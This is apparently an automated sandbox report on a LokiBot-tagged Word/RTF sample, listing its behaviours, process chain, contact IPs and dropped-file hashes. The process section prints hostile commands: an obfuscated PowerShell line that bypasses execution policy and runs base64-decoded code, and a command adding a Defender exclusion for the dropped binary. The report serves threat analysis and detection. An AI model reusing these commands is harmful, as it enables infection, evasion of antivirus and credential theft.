Malware Analysis Report

2025-04-03 09:50

Sample ID 241121-fpjp6aycqe
Target 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.doc
SHA256 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1

Threat Level: Known bad

The file 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.doc was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Lokibot

Lokibot family

Evasion via Device Credential Deployment

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

outlook_win_path

Suspicious behavior: AddClipboardFormatListener

outlook_office_path

Launches Equation Editor

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported

2024-11-21 05:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 05:02

Reported

2024-11-21 05:05

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf"

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
N/A N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2576 set thread context of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 320 wrote to memory of 2688 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 2688 wrote to memory of 2808 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2808 wrote to memory of 2088 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 1252 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1252 wrote to memory of 2604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2512 wrote to memory of 1272 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2808 wrote to memory of 2576 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2576 wrote to memory of 964 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"

C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe

"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'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'+[CHAR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF30.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEF2F.tmp"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

Network

Country Destination Domain Proto
US 66.63.187.231:80 66.63.187.231 tcp
DE 94.156.177.41:80 94.156.177.41 tcp

Files

C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta

MD5 ec0d423a3f72d69975a1e31a275f5377
SHA1 213922fb8456ecaadc24889afec1ac6ef5010c68
SHA256 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA512 8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 a34ac71400d222f400e4f0a1aa3b7e24
SHA1 e10eb1a6b583805012d6b32e48ed7583f28924af
SHA256 eb7f05c333b827a314fd3967613890e68338dedd3db7a9dccf97ee7217be41b1
SHA512 0baa4cd30c091dfc81987ccbba4262cabd6f2bebd23a11bf033245d093ad9f08236fcc6e5bf377f7ed1447b44dfbf75de75540dea0519f9c3f234e2877ae48bf

\??\c:\Users\Admin\AppData\Local\Temp\xgmcc-rp.cmdline

MD5 03cc27246d73effddabcde0c807b3ca0
SHA1 8f32dc674e23ad6ab55fa0434c79f11eb3e3b95e
SHA256 b90f9b503065cd1bc445cfcb568cac7f3015b25fff1b9bd5a509ca29f7abaca6
SHA512 1a64ef59acc448c8bda48f92bdcc93a133a3e609afe5933f2104248e8c2964ede6ee99d4d965ca0f17365d53ed15d53e97a2de1be68437e0305863f7e0eb84a2

\??\c:\Users\Admin\AppData\Local\Temp\xgmcc-rp.0.cs

MD5 b0517586f4097114e790c61f2685f0d5
SHA1 20f7482298ab96731228ebd5242ceddfd72ff50f
SHA256 a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512 c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0

\??\c:\Users\Admin\AppData\Local\Temp\CSCEF2F.tmp

MD5 a99eb9ea198acaedd5077eed8303179a
SHA1 d394d42b44edca1fe0d5ec37f7d214f41d0df184
SHA256 d5aed99214eb726589da2e693c0e5d3d9dcef4c875c310327672ca04d9e79cdc
SHA512 4eaefef8756bab8364bdbc081066d7e172fb043f4001d221c796564dd7d4b1f217f1d3373470bad71717656c1cc46645a4d4c1a2ebc263133ec0def71030ffad

C:\Users\Admin\AppData\Local\Temp\RESEF30.tmp

MD5 263725a648fa08c47ff7e93f6ae6d9c0
SHA1 ee2c49bfe3c908be90f840a82d55d572e0796d22
SHA256 033ea33d1de91319919c2fe2bbeb7e26e9fc737a361f0bf1cb82e5800b29dae8
SHA512 62d0a5030f61206cdf3cc7114d10fa6f9eb31489cb06e3db170b424eb97b1f7566363ba9e25b2164e54113c91f5bee23715230a78e72d4c92a8b24827678a3a9

C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.dll

MD5 c5f00bb6591de7e8babb742aa2484bc5
SHA1 82c7f4061ae27f8aaedf321abc5cafaef0d62ce5
SHA256 b9a7fedec9b243cc52623cf2a0d2c40666b06070122ab8f972e1cddde381c53f
SHA512 4881d72b592f6bd127fa5b11e8baa31fd17213051460ea91f2a72723332aec0a9f2a0fd7dfec6a99d76a0437f1f94ed1618b0dabf212462bbf1c8518c854aabb

C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.pdb

MD5 5c91fa3698eaa494e7bdeff3900f498d
SHA1 1771bf5cf61301c1202fc69fc7c9cb1cb062cc46
SHA256 d7acde1a4c82c2541f3135f760d937280df2247dbabf89928c70785b73c2944c
SHA512 32c228aed04738ffeff1ce0dfcf8332c2e4256e4c4863fcc105528460a4016c894eaac0b5def24dd75b44d659daaf706dbe318d98f60c946618dc21510013eab

C:\Users\Admin\AppData\Roaming\wininit.exe

MD5 66b03d1aff27d81e62b53fc108806211
SHA1 2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256 59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA512 9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1488793075-819845221-1497111674-1000\0f5007522459c86e95ffcc62f32308f1_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1488793075-819845221-1497111674-1000\0f5007522459c86e95ffcc62f32308f1_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 05:02

Reported

2024-11-21 05:05

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

141s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 92.123.26.217:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 217.26.123.92.in-addr.arpa udp
US 8.8.8.8:53 143.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

C:\Users\Admin\AppData\Local\Temp\TCDD017.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e